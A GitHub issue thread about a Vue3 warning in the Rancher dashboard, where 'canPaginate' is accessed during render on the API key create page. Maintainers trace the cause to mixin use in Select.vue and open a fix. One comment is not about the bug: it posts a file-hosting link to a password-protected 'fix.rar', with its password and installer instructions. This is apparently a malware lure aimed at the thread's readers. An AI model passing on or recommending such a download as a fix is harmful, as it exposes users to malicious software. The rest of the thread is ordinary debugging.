### ISSUE TITLE
Vue3: API Key Create Page: console warning

### ISSUE THREAD

**Issue by richard-cox** [rancher/dashboard#11722]
**Setup**
- Rancher version: dev 2.10.0

**Describe the bug**
- Warning shown when rendering create api key page
- canPaginate in the select component world is a relatively a recent addition, maybe missed some automation? maybe vue3 now warns when vue2 didn't?

**To Reproduce**
 - Nav to User Avatar --> Account & API Key --> Create API Key

**Result**
```
labeled-form-element.ts:123 [Vue warn]: Property "canPaginate" was accessed during render but is not defined on instance. 
  at <Select value="minute" onUpdate:value=fn disabled=true  ... > 
  at <Token key=3 ref="comp" value= __WEBPACK_DEFAULT_EXPORT__ {type: 'token', __clone: true, metadata: {…}, $ctx: {…}}  ... > 
  at <AsyncComponentWrapper key=3 ref="comp" value= __WEBPACK_DEFAULT_EXPORT__ {type: 'token', __clone: true, metadata: {…}, $ctx: {…}}  ... > 
  at <Index store-override="rancher" resource-override="token" parent-route-override="account"  ... > 
  at <APIKeyCreate class="outlet" onVnodeUnmounted=fn<onVnodeUnmounted> ref=Ref< Proxy(Object) {…} > > 
  at <RouterView key="/account/create-key" class="outlet" > 
  at <IndentedPanel class="pt-20" > 
  at <Plain onVnodeUnmounted=fn<onVnodeUnmounted> ref=Ref< Proxy(Object) {_fetchDelay: 200, $fetch: ƒ, setCustomColor: ƒ, removeCustomColor: ƒ, setBodyClass: ƒ, …} > > 
  at <RouterView key=1 > 
  at <App>
```

**Expected Result**
no warning

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rak-phillip** [comment]
It makes sense that we would see this error, and this is Vue3 warning us that we have done something wrong. If we take into consideration `token.vue`, we can see that this error is being generated by `Select.vue`: 

https://github.com/rancher/dashboard/blob/91b4a3dfb3633472d17368bd4ed6173e7b5a90e4/shell/edit/token.vue#L215-L221

`shell/components/form/Select.vue` doesn't consume any mixin that defines `canPaginate()` while utilizing `shell/mixins/labeled-form-element.ts`, which attempts to access `canPaginate`. 

I think this example highlights why mixins aren't the best abstraction for code reuse - the `labeled-form-element` mixin implicitly relies on code from another mixin like `labeled-select-pagination`, but this relationship isn't made clear at all..

I created #11726 to resolve the issue.

**Comment by izaac** [comment]
Unit tests look good for regression tests this issue.
